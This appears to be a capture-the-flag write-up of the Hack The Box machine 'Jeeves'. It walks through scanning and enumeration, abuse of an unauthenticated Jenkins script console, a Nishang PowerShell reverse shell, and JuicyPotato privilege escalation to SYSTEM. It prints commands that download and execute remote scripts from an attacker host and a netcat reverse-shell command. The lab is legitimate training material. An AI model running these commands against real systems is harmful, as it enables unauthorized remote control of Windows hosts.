Jeeves

Reconnaissance

First we want to run a initial nmap scan to see what ports are open and what services are on those ports.

nmap -sC -sV -oA nmap/init 10.129.174.184

  • -sC: run default nmap scripts

  • -sV: detect service version

  • -oA: output all formats to nmap/initial

We get back the following information:

init.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 20:19 EDT
Nmap scan report for 10.129.174.184
Host is up (0.034s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-03-24T05:19:57
|_  start_date: 2022-03-24T05:08:21
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m57s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.19 secondshcl

Enumeration

Passive Enumeration

IIS Directory Enumeration

gobuster dir -u http://10.129.174.184 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o iis.txt

Jetty Directory Enumeration

gobuster dir -u http://10.129.174.184:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o iis.txt

Active Enumeration

Exploring IIS

Looking at the http site we are presented with a search bar

Searching takes you to error.html which turns out to just be an image

error.html

Source code for site, the action results in error.html

<!DOCTYPE html>
<html>
<head>
<title>Ask Jeeves</title>
<link rel="stylesheet" type="text/css" href="style.css">
</head>

<body>
<form class="form-wrapper cf" action="error.html">
    <div class="byline"><p><a href="#">Web</a>, <a href="#">images</a>, <a href="#">news</a>, and <a href="#">lots of answers</a>.</p></div>
  	<input type="text" placeholder="Search here..." required>
	  <button type="submit">Search</button>
    <div class="byline-bot">Skins</div>
</form>
</body>

</html>

Exploring Jetty

Quickly checking gobuster for jetty shows that we have a directory to check out

/askjeeves

Going there we see Jenkins!

Jenkins

Turns out we have command execution without needing to be logged in which works in our favor

Initial Access

Using Nishang Invoke-PowerShellTcp.ps1 script we can create a reverse shell and get access to the box

Logonishang/Invoke-PowerShellTcp.ps1 at master ยท samratashok/nishangGitHub

First we want to copy the example to the bottom of the script so that it is run when copied to the machine we are attacking

Next we want to get a web server running and a netcat listener to catch the reverse shell. In this se I am using updog for my simple web server.

Using the script console again I run this command to download and execute the invoke powershell tcp reverse shell script

And we get a shell back!

This allows us to get user.txt!

Privilege Escalation

Juicy Potato

Next we want to run PowerUp.ps1 however we want to use the dev branch as it has extra checks

LogoGitHub - PowerShellMafia/PowerSploit at devGitHub

Then we want to run these commands in our reverse shell

IEX(New-Object Net.WebCLient).downloadString('http://10.10.14.92/PowerUp.ps1')
Invoke-AllChecks # This runs the powershell function to check everything

Right away we see SeImpersonatePrivilege which means this box is vulnerable to Juicy Potato!

LogoGitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.GitHub

We first need to download JuicyPotato.exe to the box which I am hosting from my kali box

We need to copy kali's nc.exe to the windows box

# nc.exe is located /usr/share/windows-resources/binaries/nc.exe on kali
Invoke-WebRequest "http://10.10.14.92/nc.exe" -OutFile "nc.exe"

Next we want to run JuicyPotato!

This is the input I used:

  • -t: *

  • -p: c:\windows\system32\cmd.exe

  • -a: "/c c:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.14.92 9001"

  • -l: 9001

cmd /c jp.exe -l 9001 -p c:\windows\system32\cmd.exe -a "/c c:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.14.92 9001" -t *
Got a shell

We got nt authority\system!

When we try and take a look at the administrators desktop we see hm.txt with an interesting message

Then I tried this

Alternate Data Streams

Alternate Data Streams, find more about them here

LogoWindows ::DATA Alternate Data Stream | OWASP Foundation
We can direct this into more and get the flag
C:\Users\Administrator\Desktop>more < hm.txt:root.txt
more < hm.txt:root.txt
afbc5bd4b615a606 # Only first 16 bytes of hash shown

Lessons Learned

  • Restrict who can access the Jenkins management as this opens up unauthorized access

  • In some instances a file using alternate data streams could be an indicator of compromise

  • Be careful of which service users have SeImpersonatePrivilege as this could allow an attacker to easily escelate their privileges

PreviousWindowsNextTryHackMe